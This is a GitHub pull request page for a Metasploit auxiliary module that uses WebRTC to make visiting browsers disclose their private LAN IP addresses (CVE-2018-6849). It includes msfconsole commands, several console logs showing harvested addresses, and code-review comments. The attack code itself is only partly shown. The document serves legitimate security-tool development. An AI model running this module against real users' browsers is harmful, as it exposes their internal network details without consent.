New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Private IP Leakage using WebRTC (CVE-2018-6849) #9823

Merged
merged 8 commits into from Apr 11, 2018

Conversation

Projects
None yet
5 participants
@RootUp
Contributor

RootUp commented Apr 6, 2018

This library module will take advantage of WebRTC function in browsers to get private IP of the user/victim.

Verification

  • Start msfconsole
  • use auxiliary/gather/browser_lanipleak
  • set SRVHOST <IP of MSF system to act as server>
  • set SRVPORT <port of MSF system to act as server>
  • run
msf auxiliary(gather/browser_getprivateip) > 
[*] Using URL: http://172.20.10.2:8080/
[*] Server started.

msf auxiliary(gather/browser_getprivateip) >



msf auxiliary(gather/browser_getprivateip) > 
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Received reply:
POST / HTTP/1.1
Host: 172.20.10.2:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.20.10.2:8080/
Content-Length: 11
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive

172.20.10.2

msf auxiliary(gather/browser_getprivateip) >

Note that there are some edge cases with this code. For example, it doesn't work on Firefox ESR on Kali 1.0.6.

@bcoles bcoles added module docs needs-docs and removed docs labels Apr 6, 2018

),
'License' => MSF_LICENSE,
'Author' => [
'Brendan Coles', #MSF Module

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018

Contributor

Thanks, but I did nothing. I literally grabbed the first chunk of JS I found on GitHub and slapped it in the module.

send_response(cli, @html)
when 'post'
print_status("#{cli.peerhost}: Received reply:")
puts request.to_s

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018

Contributor

Please tidy up the output.

The print_* methods are preferred over puts.

Consider augmenting the JS to send a JSON object, and parsing the JS object here for output with print_good or print_line.

info,
'Name' => "Private IP Leakage to WebPage using WebRTC Function.",
'Description' => %q(
This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018

Contributor

Please line wrap to max 120, preferably 80.

super(
update_info(
info,
'Name' => "Private IP Leakage to WebPage using WebRTC Function.",

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018

Contributor

Single quotes are preferred over double quotes when string interpolation is not required.

Also, remove the fullstop .

Also, module names are generally short and descriptive, rather than a sentence. Consider Browser LAN IP Leak or something.

[ 'CVE', '2018-6849' ],
['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
],
'DisclosureDate' => 'Jan 26 2018',

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018

Contributor

This should probably be the date the WebRTC IP leak technique was published. The first instance I'm aware of was from https://github.com/natevw some time around 2014.

This comment has been minimized.

@bcoles

RootUp added some commits Apr 6, 2018

@RootUp

This comment has been minimized.

Contributor

RootUp commented Apr 6, 2018

Works perfect for now.

msf > use auxiliary/gather/browser_lanipleak 
msf auxiliary(gather/browser_lanipleak) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf auxiliary(gather/browser_lanipleak) > set URIPATH /
URIPATH => /
msf auxiliary(gather/browser_lanipleak) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(gather/browser_lanipleak) > 
[*] Using URL: http://127.0.0.1:8080/
[*] Server started.

msf auxiliary(gather/browser_lanipleak) > 
[*] 127.0.0.1: Sending response (2523 bytes)
[*] 127.0.0.1: Sending response (2523 bytes)
[*] 127.0.0.1: Received reply:
POST / HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/
Content-Length: 13
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive

192.168.1.104

msf auxiliary(gather/browser_lanipleak) >
@s0m3gai

This comment has been minimized.

s0m3gai commented Apr 7, 2018

Neat! Just needs docs (example), looks like... 👍

RootUp added some commits Apr 10, 2018

Parsing IP address only
Changed title name and description, however few things still needs to fix.
@RootUp

This comment has been minimized.

Contributor

RootUp commented Apr 10, 2018

So the output looks something like this for now,

msf auxiliary(gather/browser_lanipleak) > 
[*] Using URL: http://192.168.1.104:8080/
[*] Server started.

msf auxiliary(gather/browser_lanipleak) > 
[*] 192.168.1.103: Sending response (2523 bytes)
[*] 192.168.1.103: Sending response (2523 bytes)
[*] 192.168.1.103: Received reply:
Fetched Private IP: 192.168.1.103
[*] 192.168.1.103: Received reply:
Fetched Private IP: 2001:0:9d38:90d7:3889:2388:3f57:fe98

msf auxiliary(gather/browser_lanipleak) >
@bcoles

This comment has been minimized.

Contributor

bcoles commented Apr 10, 2018

Looking good.

I made some minor changes, like fixing up formatting.

I also removed the requirement for ipaddr. Instead, the module uses the same regex that's used in the JavaScript.

It was meant to be a PR on your repo, but apparently the GitHub web interface doesn't work like that, and it landed directly into your branch. My bad!

@bcoles

This comment has been minimized.

Contributor

bcoles commented Apr 10, 2018

msf5 auxiliary(gather/browser_lanipleak) > run
[*] Auxiliary module running as background job 1.

[*] Using URL: http://0.0.0.0:8080/asdf
[*] Local IP: http://172.16.191.188:8080/asdf
[*] Server started.

msf5 auxiliary(gather/browser_lanipleak) > [*] 172.16.191.135: Sending response (2523 bytes)
[+] 172.16.191.135: Found IP address: 172.16.191.135
[*] 172.16.191.208: Sending response (2523 bytes)
[+] 172.16.191.208: Found IP address: 172.16.191.208
[+] 172.16.191.208: Found IP address: 172.16.191.178
Interrupt: use the 'exit' command to quit
@RootUp

This comment has been minimized.

Contributor

RootUp commented Apr 11, 2018

Okay, I have added documentation for same, please advise are we good to land here!

@acammack-r7 acammack-r7 merged commit 8b6bfcb into rapid7:master Apr 11, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully ran sanity checks.
Details
Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

acammack-r7 added a commit that referenced this pull request Apr 11, 2018

@acammack-r7

This comment has been minimized.

Contributor

acammack-r7 commented Apr 11, 2018

Thanks for the module! I added 7e4caa1 to give a little more sample output in the module documentation.

@acammack-r7 acammack-r7 self-assigned this Apr 11, 2018

@acammack-r7

This comment has been minimized.

Contributor

acammack-r7 commented Apr 11, 2018

Release Notes

The auxiliary/gather/browser_lanipleak module has been added to the framework. This module leaks the local IPs of WebRTC-enabled browsers.

msjenkins-r7 added a commit that referenced this pull request Apr 12, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment